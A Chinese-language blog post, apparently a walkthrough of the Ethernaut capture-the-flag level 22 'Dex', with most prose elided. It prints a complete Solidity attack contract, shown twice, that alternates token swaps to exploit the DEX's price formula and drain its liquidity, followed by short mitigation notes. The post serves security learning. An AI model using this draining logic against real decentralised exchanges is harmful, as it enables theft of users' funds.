智能合约黑客攻击 Ethernaut: 22. Dex

Ethernaut 是一个由 OpenZeppelin 基于 Solidity 编程语言开发的对抗游戏，每个关卡都有需要被 Hack 的智能合约。

教程

GitHub - 攻击代码
Bilibili - 视频教程
YouTube - 视频教程
TikTok - ….

题目

…

Hack思路

…

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol";

interface IDex {
    function swap(address from, address to, uint256 amount) external;
    function add_liquidity(address token_address, uint256 amount) external;
    function get_swap_price(address from, address to, uint256 amount) external view returns (uint256);
    function approve(address spender, uint256 amount) external;
    function balanceOf(address token, address account) external view returns (uint256);
}

contract DexHack {
    IDex public dex;
    IERC20 public token1;
    IERC20 public token2;

    constructor(address _dex, address _token1, address _token2) {
        dex = IDex(_dex);
        token1 = IERC20(_token1);
        token2 = IERC20(_token2);
    }
    function attack() external {
        dex.approve(address(dex), type(uint256).max);
        for (
            uint256 i = 1;
            token1.balanceOf(address(this)) <= token1.balanceOf(address(dex))
                && token2.balanceOf(address(this)) <= token2.balanceOf(address(dex));
            i++
        ) {
            if (i % 2 == uint256(0)) {
                dex.swap(address(token1), address(token2), token1.balanceOf(address(this)));
            } else {
                dex.swap(address(token2), address(token1), token2.balanceOf(address(this)));
            }
        }
        // 玩家 的余额比 Dex 某个token的余额大，可以把Dex剩余的token都换出来
        if (token1.balanceOf(address(this)) >= token1.balanceOf(address(dex))) {
            dex.swap(address(token1), address(token2), token1.balanceOf(address(dex)));
        } else {
            dex.swap(address(token2), address(token1), token2.balanceOf(address(dex)));
        }
    }
}

Hack案例

…

防范思路

现在有非常多的机制可以去缓解这个问题，比如：

Uniswap v3 设置区间的流动性
其他各种算法稳定币
找一个可靠的中心化平台获取数据，chain link 就提供一些中小化的数据。

参考资料

// SPDX-License-Identifier: MIT pragma solidity ^0.8.0; import { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol"; interface IDex { function swap(address from, address to, uint256 amount) external; function add_liquidity(address token_address, uint256 amount) external; function get_swap_price(address from, address to, uint256 amount) external view returns (uint256); function approve(address spender, uint256 amount) external; function balanceOf(address token, address account) external view returns (uint256); } contract DexHack { IDex public dex; IERC20 public token1; IERC20 public token2; constructor(address _dex, address _token1, address _token2) { dex = IDex(_dex); token1 = IERC20(_token1); token2 = IERC20(_token2); } function attack() external { dex.approve(address(dex), type(uint256).max); for ( uint256 i = 1; token1.balanceOf(address(this)) <= token1.balanceOf(address(dex)) && token2.balanceOf(address(this)) <= token2.balanceOf(address(dex)); i++ ) { if (i % 2 == uint256(0)) { dex.swap(address(token1), address(token2), token1.balanceOf(address(this))); } else { dex.swap(address(token2), address(token1), token2.balanceOf(address(this))); } } // 玩家的余额比 Dex 某个token的余额大，可以把Dex剩余的token都换出来 if (token1.balanceOf(address(this)) >= token1.balanceOf(address(dex))) { dex.swap(address(token1), address(token2), token1.balanceOf(address(dex))); } else { dex.swap(address(token2), address(token1), token2.balanceOf(address(dex))); } } }

Leek DEV

More from Leek DEV

Leek DEV

More from Leek DEV

No activity yet

More from Leek DEV

Leek DEV

Leek DEV

No activity yet

More from Leek DEV

No activity yet

No activity yet

智能合约黑客攻击 Ethernaut: 22. Dex

智能合约黑客攻击 Ethernaut: 22. Dex

教程

题目

Hack思路

Hack案例

防范思路

参考资料

教程

题目

Hack思路

Hack案例

防范思路

参考资料